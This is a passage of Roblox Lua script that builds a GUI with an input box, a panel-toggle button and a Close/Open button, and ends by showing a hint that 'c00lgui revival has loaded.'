UDim2.new(0, 0, 0.362500012, 0) input_3.Size = UDim2.new(0, 150, 0, 30) input_3.Font = Enum.Font.SourceSans input_3.PlaceholderColor3 = Color3.fromRGB(255, 255, 255) input_3.PlaceholderText = "Input" input_3.Text = "" input_3.TextColor3 = Color3.fromRGB(255, 255, 255) input_3.TextSize = 14.000 input_3.TextWrapped = true sbutton.Name = "sbutton" sbutton.Parent = CoolGui sbutton.BackgroundColor3 = Color3.fromRGB(0, 0, 0) sbutton.BorderColor3 = Color3.fromRGB(255, 0, 0) sbutton.BorderSizePixel = 3 sbutton.Position = UDim2.new(2, 0, 0, 0) sbutton.Size = UDim2.new(0, 27, 1, 0) sbutton.Font = Enum.Font.SourceSans sbutton.Text = "<" sbutton.TextColor3 = Color3.fromRGB(255, 255, 255) sbutton.TextSize = 48.000 sbutton.MouseButton1Down:connect(function() if sbutton.Text == "<" then addon.Visible = false sbutton.Text = ">" sbutton.Position = UDim2.new(1, 0, 0, 0) else addon.Visible = true sbutton.Text = "<" sbutton.Position = UDim2.new(2, 0, 0, 0) end end) cope.Name = "cope" cope.Parent = cka cope.BackgroundColor3 = Color3.fromRGB(0, 0, 0) cope.BorderColor3 = Color3.fromRGB(255, 0, 0) cope.BorderSizePixel = 3 cope.Position = UDim2.new(0, 3, 0.300000042, 380) cope.Size = UDim2.new(0, 298, 0, 20) cope.Font = Enum.Font.SourceSans cope.Text = "Close" cope.TextColor3 = Color3.fromRGB(255, 255, 255) cope.TextSize = 18.000 cope.MouseButton1Down:connect(function() if cope.Text == "Close" then CoolGui.Visible = false cope.Text = "Open" else CoolGui.Visible = true cope.Text = "Close" end end) local H = Instance.new("Hint", game.Workspace) H.Parent = game.Workspace H.Text = ("c00lgui revival has loaded.") wait(3) H:Destroy(3)